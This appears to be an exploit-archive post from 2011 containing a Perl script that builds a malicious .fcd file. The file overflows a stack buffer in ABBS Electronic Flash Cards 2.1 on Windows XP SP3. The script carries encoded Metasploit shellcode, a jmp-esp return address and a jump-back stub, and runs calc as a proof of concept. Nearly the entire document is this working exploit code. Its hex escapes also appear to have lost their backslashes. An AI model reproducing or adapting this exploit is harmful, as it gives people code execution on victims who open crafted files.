Home / exploits ABBS Electronic Flash Cards 2.1 Buffer Overflow
Posted on 15 March 2011
# Exploit Title: ABBS Electronic Flash Cards Buffer Overflow Exploit # Software Link: http://abbs.qsnx.net/downloads/abbs-flashcards.zip # Version: 2.1 # triggering details : open the app, go to test, click on random, and start test, then chose the fcd file, and booom calc pops up # Tested on: Win XP SP3 French # Date: 14/03/2011 # Author: h1ch4m # Email: h1ch4m@live.fr # Home: http://net-effects.blogspot.com my $file= "exploit.fcd"; my $size = 4108; # make a room for our shellcode my $stack = "x31xc0" . # xor eax, eax "xb4x10" . # mov ah, 10h "x29xc4" . # sub esp, eax "x90"; # nop, 0x0a is a bad char, so i added a nop 0x0a becomes 0x09 (jump) # windows/exec - 223 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc my $shellcode = "xbfxa0x03xb5xf2x33xc9xb1x32xdbxdfxd9x74x24" . "xf4x5ax31x7ax0ex03x7ax0ex83x62x07x57x07x9e" . "xe0x1exe8x5exf1x40x60xbbxc0x52x16xc8x71x63" . "x5cx9cx79x08x30x34x09x7cx9dx3bxbaxcbxfbx72" . "x3bxfaxc3xd8xffx9cxbfx22x2cx7fx81xedx21x7e" . "xc6x13xc9xd2x9fx58x78xc3x94x1cx41xe2x7ax2b" . "xf9x9cxffxebx8ex16x01x3bx3ex2cx49xa3x34x6a" . "x6axd2x99x68x56x9dx96x5bx2cx1cx7fx92xcdx2f" . "xbfx79xf0x80x32x83x34x26xadxf6x4ex55x50x01" . "x95x24x8ex84x08x8ex45x3exe9x2fx89xd9x7ax23" . "x66xadx25x27x79x62x5ex53xf2x85xb1xd2x40xa2" . "x15xbfx13xcbx0cx65xf5xf4x4fxc1xaax50x1bxe3" . "xbfxe3x46x69x41x61xfdxd4x41x79xfex76x2ax48" . "x75x19x2dx55x5cx5excfxa4x6dx4ax58x1fx04x37" . "x04xa0xf2x7bx31x23xf7x03xc6x3bx72x06x82xfb" . "x6ex7ax9bx69x91x29x9cxbbxf2xacx0ex27xf5"; my $eip = pack('V', 0x7c86467b); # jmp esp kernel32.dll my $nops = "x90" x 8; my $jump = "xe9x09xffxffxff"; # jump back 247 bytes my $junk = "x90" x ($size-length($stack.$shellcode)); open($FILE,">$file"); print $FILE $junk.$stack.$shellcode.$eip.$nops.$jump; close($FILE); print "Files Created successfully "; sleep(1);
